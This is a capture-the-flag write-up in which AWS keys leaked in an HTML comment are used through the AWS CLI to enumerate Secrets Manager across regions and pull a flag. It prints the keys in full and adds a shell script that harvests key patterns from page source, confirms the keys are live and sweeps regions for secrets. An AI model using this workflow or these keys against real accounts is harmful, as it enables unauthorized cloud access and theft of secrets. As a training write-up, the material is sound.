BSidesNYC CTFd Writeup - Secure
The objective is to find a hidden flag by exploiting a common cloud security misconfiguration: exposed credentials in publicly accessible source code. The primary tool used is the AWS Command Line Interface (CLI).
Step 1: Reconnaissance and Credential Discovery
The initial entry point is the web page's HTML source code. A quick inspection reveals a developer comment containing hardcoded AWS credentials. This is a critical vulnerability.
- Vulnerability: Hardcoded AWS Access and Secret keys.
- Full Source Code:
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>CTF: Secret Page</title>
</head>
<body>
  <h1>Welcome to our Secret Page!</h1>
  <p>We're working hard to secure our systems.</p>
  <!-- TODO: Implement proper authentication -->
  <!-- Debug information: Consider rotating these keys soon. AccessKey=AKIASHAHEEXSUMADBTWK SecretKey=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 -->
  <p>More content here...</p>
</body>
</html>
- Discovered Credentials:
- AccessKey: AKIASHAHEEXSUMADBTWK
- SecretKey: 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
Step 2: Configuring the AWS CLI
With the credentials in hand, the next step is to configure the AWS CLI to interact with the target AWS account. This is done using the aws configure command.
└─$ aws configure
AWS Access Key ID [None]: AKIASHAHEEXSUMADBTWK
AWS Secret Access Key [None]: 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
Default region name [None]:
Default output format [None]:
Step 3: Enumeration and Finding the Correct Region
Most AWS resources, Secrets Manager secrets included, live in a single region, and the CLI only queries the region it is configured for (or the one passed with --region). A common task in cloud CTFs is therefore to identify the region where the target's resources are deployed. Here this was done through trial and error.
Attempt 1 & 2 (Incorrect Regions): Initial attempts with the region names US and US-East failed with connection errors. These are not valid AWS region identifiers (valid ones look like us-east-1), and the CLI simply splices the configured string into the service endpoint hostname, so the resulting DNS name does not exist and the request never reaches AWS.
┌──(cicada㉿kali)-[~/Downloads]
└─$ aws secretsmanager list-secrets
Could not connect to the endpoint URL: "https://secretsmanager.US-East.amazonaws.com/"
Attempt 3 (Valid Region, No Secrets): Configuring the CLI for us-east-1 produced a successful API call, but listing secrets returned an empty list, so the target's secret is not stored in this region. (A permissions problem would have surfaced as an AccessDeniedException rather than an empty list.)
┌──(cicada㉿kali)-[~/Downloads]
└─$ aws configure
Default region name [US-East]: us-east-1
...
┌──(cicada㉿kali)-[~/Downloads]
└─$ aws secretsmanager list-secrets
{
"SecretList": []
}
Attempt 4 (Successful Enumeration): Finally, configuring the CLI for the us-east-2 region and running the list-secrets command successfully revealed a secret named flag.
┌──(cicada㉿kali)-[~/Downloads]
└─$ aws configure
Default region name [us-east-1]: us-east-2
...
┌──(cicada㉿kali)-[~/Downloads]
└─$ aws secretsmanager list-secrets
{
"SecretList": [
{
"ARN": "arn:aws:secretsmanager:us-east-2:152486290917:secret:flag-4gaYor",
"Name": "flag",
...
}
]
}
Step 4: Retrieving the Flag
With the secret's name (flag) and the correct region (us-east-2) identified, the final step is to retrieve its value using the get-secret-value command.
┌──(cicada㉿kali)-[~/Downloads]
└─$ aws secretsmanager get-secret-value --secret-id flag
The command returned a JSON object. Note that the SecretString field is itself a JSON document (a string containing {"Flag":"..."}), so the flag sits one decode deeper, under the Flag key.
{
"ARN": "arn:aws:secretsmanager:us-east-2:152486290917:secret:flag-4gaYor",
"Name": "flag",
"VersionId": "d1f17d56-e428-4cef-a7c7-8dcdba83b2bd",
"SecretString": "{\"Flag\":\"flag{8fde1ffcfc22a4317b4bad9fc850a8b8}\"}",
"VersionStages": [
"AWSCURRENT"
],
"CreatedDate": "2025-10-13T22:24:23.121000-04:00"
}
The captured flag is flag{8fde1ffcfc22a4317b4bad9fc850a8b8}.
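The four steps above collapsed into one script, added to this writeup as an example and not part of the original author's session. It assumes the aws CLI is installed and the discovered keys have been loaded with aws configure as in Step 2, that they carry secretsmanager:ListSecrets and secretsmanager:GetSecretValue in the target region, and that REGIONS (a hand-picked subset of commercial regions) is wide enough to contain the target. SAMPLE_HTML is the debug comment copied from the Step 1 page source so the credential extraction runs offline; every call that talks to AWS is skipped when the CLI or working credentials are absent.

```shell
#!/bin/sh
# Added example, not from the original writeup: Steps 1-4 as one script.
# Assumptions: `aws` CLI installed; the keys found on the page are loaded via
# `aws configure`; they hold secretsmanager:ListSecrets and GetSecretValue in
# the target region; REGIONS is a hand-picked subset of commercial regions.
# Anything that talks to AWS is skipped when the CLI or live credentials are
# missing, so the helper functions can be exercised offline.
set -eu

# Constructed sample: the debug comment copied from the page source in Step 1.
SAMPLE_HTML='<!-- TODO: Implement proper authentication -->
<!-- Debug information: Consider rotating these keys soon. AccessKey=AKIASHAHEEXSUMADBTWK SecretKey=tbulWFHw8zbzA7Icyeirhg+CHk6j3e7WOeskYI6F -->'

# Step 1: harvest credentials from page source on stdin. Long-term access key
# IDs are AKIA + 16 uppercase alphanumerics (ASIA for STS temporary keys); the
# secret is 40 chars of [A-Za-z0-9/+=], anchored to a Secret...Key label so
# that arbitrary base64 blobs on the page are not reported.
extract_access_keys() {
  grep -Eo '(AKIA|ASIA)[0-9A-Z]{16}' | sort -u
}
extract_secret_keys() {
  grep -Eo 'Secret[A-Za-z_]*Key *[=:] *[A-Za-z0-9/+=]{40}' \
    | sed 's/^[^=:]*[=:] *//' | sort -u
}

# Steps 2-3: region handling. Region codes look like us-east-2; "US" and
# "US-East" are not codes, and the CLI splices the string into the endpoint
# hostname verbatim, which is why they fail with "Could not connect to the
# endpoint URL" instead of an AWS-side error.
is_valid_region() {
  printf '%s\n' "$1" | grep -Eq '^[a-z]{2}(-gov)?-[a-z]+-[0-9]+$'
}
endpoint_for() {
  printf 'https://secretsmanager.%s.amazonaws.com/\n' "$1"
}

# Secrets Manager is regional, so list-secrets is repeated per region.
# --region overrides the profile default, so `aws configure` is not rerun
# for every guess.
REGIONS='us-east-1 us-east-2 us-west-1 us-west-2 ca-central-1 sa-east-1
eu-west-1 eu-west-2 eu-west-3 eu-central-1 eu-north-1
ap-south-1 ap-southeast-1 ap-southeast-2 ap-northeast-1 ap-northeast-2 ap-northeast-3'

sweep_secrets() {
  for r in $REGIONS; do
    names=$(aws secretsmanager list-secrets --region "$r" \
              --query 'SecretList[].Name' --output text 2>/dev/null) || continue
    if [ -n "$names" ] && [ "$names" != "None" ]; then
      printf '%s\t%s\n' "$r" "$names"
    fi
  done
}

# Step 4: SecretString is itself JSON here ({"Flag":"..."}), so the value needs
# a second decode. --query pulls the raw string; sed extracts Flag (no jq).
flag_from_secret_string() {
  printf '%s\n' "$1" | sed -n 's/.*"Flag" *: *"\([^"]*\)".*/\1/p'
}
fetch_flag() {  # usage: fetch_flag <region> <secret-id>
  s=$(aws secretsmanager get-secret-value --region "$1" --secret-id "$2" \
        --query SecretString --output text)
  flag_from_secret_string "$s"
}

main() {
  echo "Access keys in page source:"; printf '%s\n' "$SAMPLE_HTML" | extract_access_keys
  echo "Secret keys in page source:"; printf '%s\n' "$SAMPLE_HTML" | extract_secret_keys
  for r in US US-East us-east-2; do
    if is_valid_region "$r"; then echo "$r: valid, endpoint $(endpoint_for "$r")"
    else echo "$r: not a region; CLI would try $(endpoint_for "$r")"; fi
  done
  # Before enumerating, confirm the keys are live and which principal they are.
  if command -v aws >/dev/null 2>&1 \
     && ident=$(aws sts get-caller-identity --query Arn --output text 2>/dev/null); then
    echo "Keys are live as $ident"
    sweep_secrets
    fetch_flag us-east-2 flag || echo "no readable secret named flag in us-east-2" >&2
  else
    echo "aws CLI missing or keys not configured; skipping live calls" >&2
  fi
}
main "$@"
```

Run it after aws configure to confirm the keys with sts get-caller-identity (which also tells you the account and principal you are operating as), sweep the listed regions in one pass instead of reconfiguring per guess, and pull the flag out of the nested SecretString without a jq dependency.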